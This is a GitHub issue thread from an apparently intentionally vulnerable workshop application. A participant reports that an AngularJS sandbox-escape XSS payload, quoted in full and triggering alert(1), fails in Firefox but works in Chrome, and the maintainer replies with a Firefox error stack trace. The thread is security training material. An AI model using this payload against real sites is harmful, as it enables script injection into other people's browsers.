caseydunham / Being-MEAN

Security BSidesBoston Workshop Application
MIT License

Angular XSS example does not seem to work in Firefox #37

Open tricklynch opened 7 years ago

tricklynch commented 7 years ago

Browser version: Firefox 52.0.2
Build identifier: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Payload: {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

The alert does not trigger. I first noticed this when Firefox's XSS filter was on; turning it off did not affect the problem. Also, I was proxying my traffic through ZAP; I stopped proxying my traffic and it continued to not work. The alert triggers in Chrome.

caseydunham commented 7 years ago

Interesting. Just tested with the same version and it throws an error in the Firefox console:

Error: invalid assignment left-hand side
td.prototype.compile@https://code.angularjs.org/1.5.8/angular.min.js:233:35
kc.prototype.parse@https://code.angularjs.org/1.5.8/angular.min.js:260:78
g@https://code.angularjs.org/1.5.8/angular.min.js:125:368
vf/this.$get</m.prototype.$eval@https://code.angularjs.org/1.5.8/angular.min.js:145:343
anonymous/fn@https://code.angularjs.org/1.5.8/angular.min.js line 233 > Function:2:1031
l/<@https://code.angularjs.org/1.5.8/angular.min.js:127:87
vf/this.$get</m.prototype.$digest@https://code.angularjs.org/1.5.8/angular.min.js:143:43
vf/this.$get</m.prototype.$apply@https://code.angularjs.org/1.5.8/angular.min.js:146:111
Bc/c/<@https://code.angularjs.org/1.5.8/angular.min.js:20:486
h/<.invoke@https://code.angularjs.org/1.5.8/angular.min.js:41:454
Bc/c@https://code.angularjs.org/1.5.8/angular.min.js:20:407
Bc@https://code.angularjs.org/1.5.8/angular.min.js:21:179
fe@https://code.angularjs.org/1.5.8/angular.min.js:20:1
@https://code.angularjs.org/1.5.8/angular.min.js:317:386
b@https://code.angularjs.org/1.5.8/angular.min.js:189:487
Sf@https://code.angularjs.org/1.5.8/angular.min.js:37:125
Rf/d@https://code.angularjs.org/1.5.8/angular.min.js:37:74

I don't have time to dig into it right now, but I wonder what changed in the browser. It's still the same version of AngularJS being used.